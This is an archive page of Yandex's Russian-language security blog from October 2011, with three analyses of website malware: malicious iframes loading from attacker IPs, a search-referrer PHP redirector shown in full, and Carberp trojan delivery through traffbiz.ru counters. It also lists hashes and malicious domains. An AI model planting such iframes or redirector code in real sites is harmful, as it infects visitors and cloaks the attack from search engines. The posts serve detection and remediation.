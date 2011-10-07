Блог о безопасности

октябрь 2011
Вредоносный фрейм Mal/Iframe-X
7 октября 2011, 13:20

В последнее время наша система существенно чаще, чем обычно, находит сайты с вредоносным кодом, который относится к Mal/Iframe-X по классификации компании Sophos. Динамика числа уникальных хостов, заражённых данным вредоносным кодом, выглядит так:



Признаком заражения страницы Mal/Iframe-X является обнаружение в DOM тега IFRAME, в который загружается браузерный вредоносный код. Примерно в 75% случаев это происходит при прописывании этого тега непосредственно в HTML-коде страницы, в оставшихся 25% – при выполнении в контексте браузера специального JavaScript-файла, который дописывает тег в код страницы.


  • Пример вредоносного кода в HTML-страницах:

    <iframe frameborder=0 src="http://64.247.185.149/Home/index.php" width=1 height=1 scrolling=no>
  • Пример вредоносного кода в JavaScript-файлах:

    document.write('<iframe frameborder=0 src="http://65.75.160.235/Home/index.php" width=1 height=1 scrolling=no>)
  • В атрибуте SRC вредоносного IFRAME практически всегда содержится URL вида:

    http://IP_ADDRESS/Home/index.php
    где IP_ADDRESS - это IP-адрес сервера злоумышленников, с которого подгружается основная часть  вредоносного кода.


Как видно из графика ниже, особой популярностью у злоумышленников, распространяющих  код Mal/Iframe-X, пользуются сайты в доменной зоне COM. Доли доменных зон выглядят следующим образом:



Для распространения основной части вредоносного кода злоумышленники используют серверы с различными IP-адресами, но примерно в четверти случаев это IP-адрес 64.247.185.149&. Доли серверов злоумышленников, которые участвуют в заражении, выглядят следующим образом:



Упрощённая схема работы Mal/Iframe-X выглядит так:




Рекомендации

Рекомендуем вам проверить, нет ли на страницах ваших сайтов подобного вредоносного кода. Если вы не знаете, является ли ваш сайт источником распространения вредоносного кода, или о сайте известно, что он заражён, но непонятно, что это за вредоносный код и как от него избавиться – вы можете зарегистрироваться на сервисе Яндекс.Вебмастер, с помощью которого можно посмотреть детальную информацию о заражении, рекомендации по его лечению, а также запустить внеочередную перепроверку сайта.

Дополнительная информация о том, как обезопасить сайт и компьютер в интернете, содержится в статьях:
17 комментариев
исследования
Вредоносный редиректор на osa.pl
14 октября 2011, 17:01

Злоумышленники нередко взламывают сайты для того, чтобы разместить на них редиректоры — ПО, которое автоматически перенаправляет браузер пользователя на подконтрольные злоумышленникам веб-серверы. В результате зараженный сайт становится частью их системы распространения вредоносного кода.


Когда Безопасный Поиск Яндекса обнаруживает такие редиректоры, к содержащим их сайтам применяются следующие меры:

  • В результатах поиска сайт отображается с пометкой о том, что он представляет опасность для пользователя, и количество переходов на него с поисковой выдачи снижается в 50-100 раз.
  • Браузеры, использующие Safe Browsing API Яндекса, также предупреждают пользователей, что страница представляет опасность, даже когда  переход на зараженный ресурс происходит не с поисковой выдачи. Это ещё сильнее снижает посещаемость сайта.
  • Если владельцы взломанного ресурса не устранили проблему, сайт совсем убирается из результатов поиска, т.к. постоянное перенаправление (редирект) на другой сайт, по сути, превращает этот ресурс в дорвей, который не даёт ответов на вопросы, задаваемые пользователями.

Подобные проблемы часто возникают из-за заражения скриптов популярных CMS веб-серверным вредоносным кодом. Наиболее популярным в настоящее время является следующий код:


error_reporting( 0 );
$qazplm=headers_sent(  );
if ( !$qazplm ) {
$referer = $_SERVER[ 'HTTP_REFERER' ];
$uag = $_SERVER[ 'HTTP_USER_AGENT' ];
if ( $uag and !stristr( $uag, "StackRambler" ) and
    !stristr( $uag, "aport" ) and
    !stristr( $uag, "WebAlta" ) and
    !stristr( $uag, "aport" ) and
    !stristr( $uag, "compatible; Yandex" ) and
    !stristr( $uag, "dyatel" ) ) {
if ( stristr( $referer, "yandex" ) or
     stristr( $referer, "yahoo" ) or
     stristr( $referer, "google" ) or
     stristr( $referer, "bing" ) or
     stristr( $referer, "rambler" ) or
     stristr( $referer, "gogo" ) or
     stristr( $referer, "live" )  or
     stristr( $referer, "aport" ) or
     stristr( $referer, "nigma" ) or
     stristr( $referer, "webalta" ) or
     stristr( $referer, "meta.ua" ) or
     stristr( $referer, "bigmir.net" ) or
     stristr( $referer, "tut.by" ) or
     stristr( $referer, "ukr.net" ) or
     stristr( $referer, "poisk.ru" ) or
     stristr( $referer, "liveinternet.ru" ) or
     stristr( $referer, "gde.ru" ) or
     stristr( $referer, "quintura.ru" ) or
     stristr( $referer, "qip.ru" ) or
     stristr( $referer, "mail.ru" ) or
     stristr( $referer, "metabot.ru" ) ) {
     if ( !stristr( $referer, "cache" ) or
          !stristr( $referer, "inurl" ) ) {
              header( "Location: http://malwarehost/malwarepath/" );
              exit(  );
   }
  }
}
}

где:
  • malwarehost — хост, который распространяет вредоносное ПО;
  • malwarepath — директория на хосте, который распространяет вредоносное ПО.

Этот код обычно присутствует в PHP-файлах и может быть обфусцирован (закодирован).



Алгоритм работы вредоносного кода

  1. Сначала вызов функции error_reporting(0) отключает вывод ошибок при выполнении скрипта, так что даже если в веб-серверном вредоносном коде произойдет ошибка, то посетивший страницу пользователь ничего не увидит.
    Далее вызовом функции headers_sent(…) проверяется, был ли клиенту отправлен ответ с HTTP-заголовками. Если нет, то происходит получение Referer и User-Agent.
  2. После этого поиском соответствующей подстроки в значении User-Agent проверяется, не бот ли посещает страницу.
  3. Если это не бот, то проверяется, пришел ли он с одной из поисковых систем, приведенных ниже:

    www.yandex.ru;
    www.yahoo.com;
    www.google.com;
    www.bing.com;
    www.rambler.ru;
    www.gogo.ru;
    www.live.com;
    www.aport.ru;
    www.nigma.ru;
    www.webalta.ru;
    www.meta.ua;
    www.bigmir.net;
    www.tut.by;
    www.ukr.net;
    www.poisk.ru;
    www.liveinternet.ru;
    www.gde.ru;
    www.quintura.ru;
    www.qip.ru;
    www.mail.ru;
    www.metabot.ru

  4. Если пользователь перешёл на заражённый сайт с одной из указанных выше поисковых систем, и при этом он не просматривает сохранённую копию страницы в кэше поисковой системы, то выполняется перенаправление пользователя на сайт,  указанный в вызове функции header().



    5. Статистика распространения


    Всего Яндексу известно более 800 зараженных уникальных хостов, которые являются редиректорами на osa.pl. Пик распространения вредоносного кода пришелся на 20.09.2011. Общая динамика заражения приведена ниже:

    Чаще всего этот код находится на сайтах, доменное имя которых расположено в зоне RU:

    На домене osa.pl есть несколько поддоменов, которые являются промежуточными звеньями в цепочках распространения вредоносного кода. Статистика по использованию этих поддоменов такова:

    Сайты с некоторыми CMS заражают редиректорами на osa.pl чаще, чем другие:

    Распространяемое вредоносное ПО


    Вредоносное ПО, распространяемое через эти редиректы, на 28.09.2011 детектировали всего 4 антивируса из 43 (по данным VirusTotal.com).

    Хеши семпла:

    • MD5: c4d0e04e521dd8d920cb644b4075c6f0;
    • SHA1: 2fa568a42c04f6647fa5808bf8fdfd405aced9c3;
    • SHA256: 428262fa0edbee619df2913beaf0e22abcd6e67408db892bc275292526d3157f.


    Распространяемое вредоносное ПО часто представляет собой фальшивый антивирус. Для автоматического запуска во время загрузки ОС оно прописывает себя в ветку реестра: 

    HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce


    Пользовательский интерфейс этого фальшивого антивируса выглядит так:



    Никакого отношения к настоящим антивирусам данное вредоносное ПО, разумеется, не имеет.


    Рекомендации


    Рекомендации по обеспечению безопасности вашего сайта аналогичны приведённым в предыдущей статье.

    Кроме того, обязательно проверяйте свой сайт на наличие вредоносного кода в auto_prepend_file и конструкции, связанные с обработкой ошибок.

    Команда безопасного поиска Яндекса


56 комментариев
исследования
Распространение вредоносных программ через счётчики партнёрской программы traffbiz.ru
24 октября 2011, 18:17
Один из способов заработать на своём сайте – стать участником партнёрской программы по обмену трафиком и установить на свои страницы счётчик, за показ которого можно получать деньги. К сожалению, вебмастеры не всегда задумываются о том, что контент, подгружаемый из непроверенных источников, может вредить пользователям.

Не все партнёрские программы способны гарантировать безопасность распространяемого через них контента, а некоторые из них целенаправленно используются злоумышленниками, чтобы заражать компьютеры посетителей сайтов-партнёров. В этом случае кратковременный заработок вебмастера, участвующего в партнёрской программе, может привести к заметному снижению посещаемости его сайта.

Мы уже описывали проблему, вызванную партнёрскими программами для выкупа IFRAME-трафика, построенными на CMS AdminStation. В этом посте мы хотели бы обратить внимание на проблему распространения вредоносного кода через счётчик одной из бирж трафика, которые тогда использовали AdminStation – партнёрской программы traffbiz.ru.

Партнёрская система traffbiz.ru позволяет продавать и покупать трафик. Для этого вебмастер должен зарегистрироваться в системе и на специальной странице  добавить в неё свой сайт. В дальнейшем ему предлагается выбрать счётчик и установить на страницы своего сайта код, который в некоторых случаях ведёт себя как вредоносный. Интерфейс выбора вредоносного счётчика выглядит так:



В настоящее время Яндексу известно более 4100 сайтов, которые используют traffbiz.ru и добавили код таких счётчиков на свои страницы.

Код с traffbiz.ru работает следующим образом:
  1. JavaScript №1 из кода счётчика при выполнении дописывает на страницу JavaScript №2;
  2. JavaScript №2 при выполнении подгружает на страницу JavaScript №3;
  3. JavaScript №3 отображает счётчик или баннер;
  4. JavaScript №3 (в некоторых случаях) подгружает и запускает вредоносный код.

В распространении вредоносного кода через счётчики traffbiz.ru за последние две недели были замечены следующие хосты:

  • 1sbiz.ru;
  • 4sbiz.ru;
  • 5sbiz.ru;
  • 8sbiz.ru;
  • 9sbiz.ru;
  • 10sbiz.ru;
  • countbiz.ru;
  • frps.homeftp.org;
  • google.webhop.info;
  • manager.dyndns.info;
  • traffbiz.is-by.us.

Вредоносный код, распространяемый через счётчики traffbiz.ru, пытается использовать уязвимости в популярных браузерах и их плагинах. При использовании хотя бы одной из уязвимостей на компьютер пользователя загружается и устанавливается вредоносная программа.

Вредоносное ПО, которое распространятся через счётчики traffbiz.ru, является троянской программой-формграббером. Она собирает банковскую информацию, вводимую пользователем, например учётные записи в системах банк-клиент, и передает ее злоумышленникам. В результате злоумышленники могут получить доступ к банковским счётам пользователей и совершать с ними операции.

Троянская программа имеет следующие контрольные суммы (хеши):
  • MD5: 6d3d8bb5be70d1268e6b817c9129a444;
  • SHA1: 1202e1ae935c2c35baad26345685063c22c9ffd5;
  • SHA256: 13d4948b35f57d9c25f9a7cb21443084df75fa409379c358ea6b662fd300c251.

По классификации компании Symantec, эта троянская программа имеет название Carberp. По функциональности найденная версия похожа на описанную нами раньше. При этом, по данным сайта VirusTotal.com, на 04.10.2011 она не детектировалась ни одним из 43 антивирусов, представленных на сайте, а 11.10.2011 – уже 16 антивирусами.

Возможно, ситуация с детектированием 04.10.2011 была вызвана тем, что код троянской программы был зашифрован, т.к. после расшифровки 04.10.2011 на VirusTotal.com её детектировали 15 антивирусов из 43, а 11.10.2011 – уже 29.


Рекомендации


В целом, рекомендации для вебмастеров аналогичны тем, которые приведены здесь. Важно помнить: когда вебмастер размещает на своём сайте чужой, динамически подгружаемый контент, он теряет часть контроля над тем, что будет передаваться на компьютер пользователя при посещении его сайта.

Поэтому к выбору партнёрских программ и рекламных сетей нужно подходить очень тщательно. Обращайте внимание на то, как их владельцы относятся к безопасности,  проверяют ли распространяемый через их систему контент, выясняйте, почему они платят за показы больше других.

Злоумышленники часто используют партнёрские программы для распространения вредоносного кода. Поэтому если партнёрская программа дорожит клиентами, партнёрами и репутацией, то её создателям рекомендуется проверять размещаемый рекламный контент и ссылки на сайты на наличие вредоносного содержимого. В частности, для такой проверки можно использовать информацию о заражённых сайтах, доступную через Safe Browsing API Яндекса.

Команда безопасного поиска Яндекса

56 комментариев
исследования